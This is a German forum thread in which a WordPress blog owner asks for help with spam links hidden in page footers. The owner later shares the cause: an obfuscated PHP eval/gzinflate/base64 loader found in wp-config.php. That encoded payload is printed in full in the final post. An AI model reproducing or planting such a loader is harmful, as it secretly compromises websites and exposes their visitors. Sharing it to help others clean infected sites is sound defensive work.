Spam im Quelltext - wie bekomme ich das raus?

  • Hallo!

    Ich habe über die Board-Suche bereits 2x ähnliche Artikel gefunden (header gehackt + Spam im Quelltext), leider hilft mir das nicht weiter, da der schadhafte Code wohl anders aussieht.

    Ich habe auf allen Seiten meines Blogs (blog-gutscheine-oase.de) unzählige Spam-Links, die nur im Quelltext auftauchen und zwar immer im Footer-Bereich. Der Exploit Scanner sucht noch... ich vermute, dass das Theme schuld ist. Leider hilft auch Deaktivierung der Plugins und des Themes nicht.

    Kann mir jemand helfen?! Bzw. hat jemand ne Idee, was man da machen kann?!

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • werd mal konkret, Beispiele usw. Dein "Blog" sieht für mich eh wie eine riesige Spamlink-Blase aus, aber offensichtlich beabsichtigt.

    Zitat

    ich vermute, dass das Theme schuld ist. Leider hilft auch Deaktivierung der Plugins und des Themes nicht.


    Wenn die deaktivierung des themes NICHT hilft, liegt es wohl kaum am theme selbst.

  • Spamlink-Blase?! Naja... ich versuche schon einen Mehrwert für meine Besucher zu schaffen, aber sei's drum... deine Meinung und ok!

    Wegen meinem Verdacht des Themes: ich hab auf einem anderen Blog, der vorher keine Spam-Links im Quelltext hatte, mal spasseshalber dasselbe Theme aktiviert und wieder deaktiviert... und da waren plötzlich diese Links da... ich versteh das auch nicht!

    Wie oder wo hackt sich das "etwas" in meine WP-Dateien?! Wie kriegt man das wieder raus?!

  • So... endlich!

    Nachdem ich mir ja wohl selbst helfen musste, hab ich die letzten Tage wie wild nach dem schadhaften Code gesucht... und wurde in der wp-config.php fündig.

    Dort war folgender code enthalten:

    PHP
    <?php /*a44a13f660ad910fc503d6c328d2cf43*/ eval(gzinflate(base64_decode('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')));?>
    <?php

    der dafür sorgte, dass bei jeder Seite am Ende unzählige Spam-Links auftauchten. Nachdem ich nun diesen Code entfernt habe und alle Passwörter aller Zugangsmöglichkeiten geändert habe, funzt nun wieder alles wie vorher.

    Vielleicht kann dieser Beitrag anderen helfen, die ein ähnliches Problem wie ich hatten und ähnlich verzweifelt waren

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!